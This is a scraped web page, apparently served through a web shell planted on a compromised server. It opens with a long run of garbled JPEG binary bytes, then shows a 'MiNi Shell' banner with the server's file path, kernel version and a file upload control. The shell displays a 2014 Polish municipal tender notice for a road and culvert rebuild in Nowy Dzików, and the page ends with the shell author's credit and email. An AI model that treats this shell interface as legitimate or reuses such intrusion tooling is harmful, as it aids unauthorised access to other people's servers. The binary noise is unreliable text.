JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140825/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140825/281012-N-2014.html

<p class="kh_header"><b>Stary Dzików: PRZEBUDOWA DROGI GMINNEJ NR 105005R NR EWID.  DZIAŁKI 754, 755, 756, 476  W MIEJSCOWOŚCI NOWY DZIKÓW KM 0 + 000 - KM 0 + 390
WRAZ   Z PRZEBUDOWĄ PRZEPUSTÓW KM  0 + 003 I KM 0 + 054</b><br>
<b>Numer ogłoszenia: 281012 - 2014; data zamieszczenia: 25.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stary Dzików , ul. T. Kościuszki 79, 37-632 Stary Dzików, woj. podkarpackie, tel. 0-16 631 80 50, faks 0-16 631 80 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starydzikow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA DROGI GMINNEJ NR 105005R NR EWID.  DZIAŁKI 754, 755, 756, 476  W MIEJSCOWOŚCI NOWY DZIKÓW KM 0 + 000 - KM 0 + 390
WRAZ   Z PRZEBUDOWĄ PRZEPUSTÓW KM  0 + 003 I KM 0 + 054.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1 Parametry techniczne stanu istniejącego
- klasa D, Vp = 30km h 
- szerokość jezdni 3.50m  z ubytkami
- szerokość pobocza 0.75m - 1.00m
- nawierzchnia drogi kamienna km 0 + 000 - km 0 + 390                                
- odwodnienie drogi system rowów otwartych i przepustów
- teren przebiegu trasy płaski
- przebieg drogi km 0 + 000 - km 0 + 390 teren zabudowany                         
- stan techniczny wg SOSN: km 0 + 000 - km 0 + 390: D nawierzchnia stan zły
- charakter ruchu ogólnodostępny,  ruch lokalny,  gospodarczy, turystyczny
3.2 	Trasa
Objęta opracowaniem droga nr 105005R położona jest w terenie płaskim. Droga przebiega przez tereny zabudowane i pola, stanowi dojazd okolicznych mieszkańców do swoich posesji i pól. Szerokość korony  drogi (5.00m do 6.00m).  Działki objęte przebudową stanowią własność Gminy Stary Dzików  obręb geodezyjny Nowy Dzików działka nr ewidencyjny 754, 755, 756, 476.
3.3 Nawierzchnia
Istniejąca droga nr 105005R od km 0 + 000 - km 0 + 390 posiada nawierzchnię tłuczniową średniej gr. od 10cm do 15cm.  Nawierzchnia posiada liczne ubytki przy krawędziach str. L i P, wyboje i koleiny. Istniejące jezdnia posiada nienormatywne spadki poprzeczne na prostych i łukach. Stan techniczny nawierzchni ogólnie jest zły, droga jest przejezdna. 
3.4 	Pobocza
Na omawianych odcinkach znajdują się pobocza ziemne o szerokości 0.75m - 1.00m. Pobocza są nieregularne  i zawyżone.
3.5 	Odwodnienie
 Wody powierzchniowe odprowadzane są z nawierzchni za pomocą spadków podłużnych i poprzecznych  do istniejących rowów od km 0 + 000 - km 0 + 130, zaś od km 0 + 130 - km 0 + 390 wody powierzchniowe odprowadzane są z nawierzchni za pomocą spadków podłużnych i poprzecznych w istniejący teren. Na omawianym odcinku nie występują przepusty i inne urządzenia odwadniające, które wymagają przebudowy. 
- km 0 + 003 przepust fi 40 dł. 10mb: bez murków do przebudowy
- km 0 + 054 przepust fi 50 dł. 7mb: bez murków do przebudowy
- km 0 + 387 przepust fi 40 dł. 10mb: bez murków do przebudowy
3.6 	Zjazdy
Na omawianym odcinku występują zjazdy do gospodarstw, pól o nawierzchni gruntowej. Zjazdy zlokalizowane są po obu stronach drogi. . Szczegółowy stan istniejących zjazdów przedstawia   Tabela zjazdów 
3.7 	Skrzyżowania
- km 0 + 000 krawędź skrzyżowania z drogą Nowy Dzików przez wieś
- km 0 + 390 krawędź skrzyżowania z drogą Nowy Dzików przez wieś
3.8 Oznakowanie i urządzenia zabezpieczające
Odcinek objęty opracowaniem posiada następujące oznakowanie pionowe. 
- km 0 + 010 str. L znak B - 20, słupek betonowy, stan zły
- km 0 + 380 str. P znak B - 20, słupek betonowy, stan zły
3.9 Urządzenia obce
Usytuowanie urządzeń obcych przedstawiono na planie sytuacyjnym. W terenie mogą znajdować się następujące urządzenia.
- sieć wodociągowa
- sieć kanalizacyjna
- linia energetyczna podziemna i naziemna
- lina teletechniczna podziemna i naziemna 
- linia gazowa

3.10	OPIS PRAC PROJEKTOWYCH
3.11 Charakterystyka techniczna
- klasa techniczna D, Vp = 30km h
- kategoria ruchu  KR 1 - 2
- teren płaski
- przekrój poprzeczny szlakowy km 0 + 000 - km 0 + 390
- szerokość jezdni km 0 + 000 - km 0 + 390 - 3.50m 
- szerokość pobocza ziemnego km 0 + 000 - km 0 + 390 str. L i P  0.75m - 1.00m
- projektowana nawierzchnia drogi bitumiczna + wzmocnienie
- odwodnienie drogi system spadków podłużnych i poprzecznych, rowów otwartych i przepustów
- przebieg drogi km 0 + 000 - km 0 + 390 teren zabudowany
- stan techniczny wg SOSN: km 0 + 000 - km 0 + 390: A nawierzchnie stan dobry                                             
- charakter ruchu ogólnodostępny,  ruch lokalny,  gospodarczy, turystyczny
3.12 Trasa
Zakres przebudowy drogi przyjęto do projektu wg poniższej lokalizacji:
- PPO km 0 + 000 krawędź skrzyżowania z drogą Nowy Dzików przez wieś
- KPO km 0 + 390 krawędź skrzyżowania z drogą Nowy Dzików przez wieś
Działki objęte przebudową stanowią własność Gminy Stary dzików  obręb geodezyjny Nowy Dzików działka nr ewidencyjny 754, 755, 756, 476.
3.13 Przekrój podłużny
Na całym odcinku niweletę projektowanej drogi dostosowano do istniejącego terenu uwzględniając spadki podłużne i poprzeczne terenu, oraz odprowadzenie wód do istniejących przepustów. Spadki podłużne niwelety uwarunkowano przebiegiem istniejącej drogi. W związku z tym, że istniejąca nawierzchnia posiada ubytki nawierzchni, wyboje i koleiny przed wykonaniem zasadniczej warstwy bitumicznej wykonać należy uzupełnienie ubytków str. L lub P, profilowanie kruszywem sortowanym 0/63 i tłuczniem  średniej gr. 1cm - 3cm, oraz wzmocnienie z kruszywa sortowanego 032, 063 i tłucznia gr. 10cm - 15cm a następnie warstwy bitumiczne wiążącą gr. 4cm i ścieralną gr 3cm.
3.14	 Przekrój normalny
Spadek poprzeczny poboczy ziemnych 6% w kierunku rowu. Spadek jezdni daszkowy na prostej 2%. Na łukach jednostronny (spadki na łukach poziomych przyjąć wg istniejących), rowy trapezowe, szerokość dna rowu 0.40m, pochylenie skarp od 1:1 do 1 : 1.5. 
Projektowana nawierzchnia km 0 + 000 - km 0 + 140 i km 0 + 280 - km 0 + 390
- 3cm warstwa ścieralna z betonu asfaltowego dla KR 1 - 2
- 4cm warstwa wiążąca z betonu asfaltowego dla KR 1 - 2
- 10cm górna warstwa nawierzchni z kruszywa sortowanego 063
- 2cm warstwa profilowa z kruszywa sortowanego 063

Projektowana nawierzchnia km  km 0 + 140  - km 0 + 280 
- 3cm warstwa ścieralna z betonu asfaltowego dla KR 1 - 2
- 4cm warstwa wiążąca z betonu asfaltowego dla KR 1 - 2
- 5cm górna warstwa nawierzchni z kruszywa sortowanego 0/32
- 10cm dolna warstwa nawierzchni z tłucznia 20 63
- 1cm warstwa profilowa z tłucznia 20 63

Projektowana nawierzchnia ubytków km 0 + 000 - km 0 + 390 str. L lub str. P
- 7cm dolna warstwa nawierzchni z tłucznia 20 63
- 20cm warstwa odsączająca z piasku

Nawierzchnia zjazdów
- 5cm warstwa ścieralna z betonu asfaltowego dla KR 1 - 2
- 15cm górna warstwa nawierzchni z tłucznia kamiennego 20 63
- 15cm warstwa odsączająca z piasku
3.15 Odwodnienie
Wody powierzchniowe odprowadzane będą z nawierzchni za pomocą spadków podłużnych i poprzecznych    w przyległy teren i do istniejących rowów przydrożnych, które wymagają odmulenia i odbudowy. 
- odmulenie rowów od km 0 + 003 - km 0 + 117 str. P
- odbudowa rowów od km 0 + 003 - km 0 + 125 str. L
Wykonując odmulenie i odbudowę istniejącego rowu należy zachować istniejące spadki podłużne. Przed wykonaniem robót należy zniwelować istniejący rów a następnie należy prowadzić roboty w taki sposób aby umożliwić spływ wody do istniejących cieków wodnych. Krzaki należy wyciąć a następnie zutylizować. Rowy trapezowe, szerokość dna rowu 0.40m, pochylenie skarp od 1:1 do 1 : 1.5, głębokość średnia od 0.50cm do 0.70cm.
Na omawianym odcinku projektuje się przebudowę przepustów.
- km 0 + 003 przepust fi 50 dł. 10mb wykonanie części przelotowej z wykonaniem murków czołowych
- km 0 + 054 przepust fi 50 dł. 7mb wykonanie części przelotowej z wykonaniem murków czołowych
- km 0 + 387 przepust fi 50 dł. 10mb wykonanie części przelotowej z wykonaniem murków czołowych
Na przepustach projektuje się: rozebranie istniejących przepustów, przebudowa istniejących części przelotowych, wykonanie murków czołowych.
Projektuje się ułożenie części przelotowej z rur PECOR OPTIMA SN8 dwuściennych karbowanych o sztywności obwodowej 8kPa z PEHD lub równoważnych. Przy przebudowie przepustów należy zachować istniejące rzędne posadowienia wlotu  i wylotu przepustu oraz spadki części przelotowej.  Murki czołowe należy wykonać betonowe z betonu B -25, dopuszcza się ustawienie murków prefabrykowanych na fundamencie
3.16  Zjazdy
Na projektowanym odcinku znajdują się zjazdy do pól i zjazdy zbiorcze. Lokalizacja   i szczegółowe zakresy robót przedstawiono w Tabeli zjazdów. Ww zjazdy są istniejące, roboty będą polegać jedynie na przebudowie części przelotowych i nawierzchni zjazdów. Ww zjazdy są istniejące, roboty będą polegać jedynie na odbudowie ich części przelotowych i wykonaniu nawierzchni zjazdów. Projektuje się ułożenie części przelotowej zjazdu z rur  fi 40 PECOR OPTIMA SN6 dwuściennych karbowanych o sztywności obwodowej 6kPa z PEHD lub równoważnych na ławie z pospółki gr. 10cm. 
3.17	 Skrzyżowania
- km 0 + 000 krawędź skrzyżowania z drogą Nowy Dzików przez wieś
- km 0 + 390 krawędź skrzyżowania z drogą Nowy Dzików przez wieś
3.18 Oznakowanie pionowe
Oznakowanie pionowe pozostaje bez zmiany. Projektuje się wykonanie wymiany istniejących słupków i tablic znaków. Projektuje się ustawienie słupków do znaków drogowych z rur stalowych fi 50mm, z zamontowaniem, zabetonowaniem i zasypaniem. Całkowita dł. słupka 3.5m. Tablice mocowane do słupków,  tablice znaków z foli odblaskowej 3M, wielkość średnie.
- km 0 + 010 str. L znak B - 20, słupek metalowy
- km 0 + 380 str. P znak B - 20, słupek metalowy
3.19  KOLIZJE
Usytuowanie urządzeń obcych przedstawiono na planie sytuacyjnym. W terenie mogą znajdować się następujące urządzenia.
- sieć wodociągowa
- sieć kanalizacyjna
- linia energetyczna podziemna i naziemna
- lina teletechniczna podziemna i naziemna 
- linia gazowa
Roboty w obrębie ww urządzeń wykonywać ręcznie, pod nadzorem odpowiednich służb.

3.20 UWAGI KOŃCOWE
- roboty w rejonach kolizji wykonywać szczególnie ostrożnie pod nadzorem właściwych służb eksploatacyjnych
- roboty ziemne w obrębie kolizji wykonywać ręcznie
- nie zachodzi potrzeba wykonywania jakichkolwiek wyburzeń
- materiały stosowane do wykonania robót powinny posiadać niezbędne atesty i być dopuszczone do obrotu  w krajach UE
- na czas wykonywania robót należy zabezpieczyć plac budowy oraz wykonać niezbędny plan oznakowania robót i ich zabezpieczenia
- uwaga ww opracowanie służy jedynie jako materiał do przetargu
- uwaga! przed wykonaniem robót należy wyznaczyć granice pasa drogowego działki obręb geodezyjny Nowy Dzików działka nr ewidencyjny 754, 755, 756, 476.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9, 45.23.33.20-8, 45.22.12.44-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium w wysokości  4 000,00 zł  
(słownie: cztery tysiące złotych 00-100)
Wadium może być wnoszone w jednej lub kilku następujących formach: 
a) pieniądzu, 
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
c) gwarancjach bankowych, 
d) gwarancjach ubezpieczeniowych, 
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (DzU nr 109, poz. 1158 ze zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa zamówienia  (potwierdzone dokumentami, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone) polegające na realizacji budowy, przebudowy, remontów obiektów drogowych . Wartość każdego zadania nie może być mniejsza niż  100 000  zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje co najmniej: 
  jedną osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia do kierowania robotami  w zakresie objętym przedmiotem zamówienia tj. branży drogowej oraz posiadającą doświadczenie w pełnieniu funkcji kierownika budowy przy realizacji min. jednego zadania spełniającego warunek opisany w rozdz. 6 pkt 1,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.starydzikow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Starym Dzikowie
ul. Kościuszki 79
37-632 Stary Dzików
pok. nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2014 godzina 09:00, miejsce: Urząd Gminy w Starym Dzikowie
ul. Kościuszki 79
37-632 Stary Dzików
pok. nr 1 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com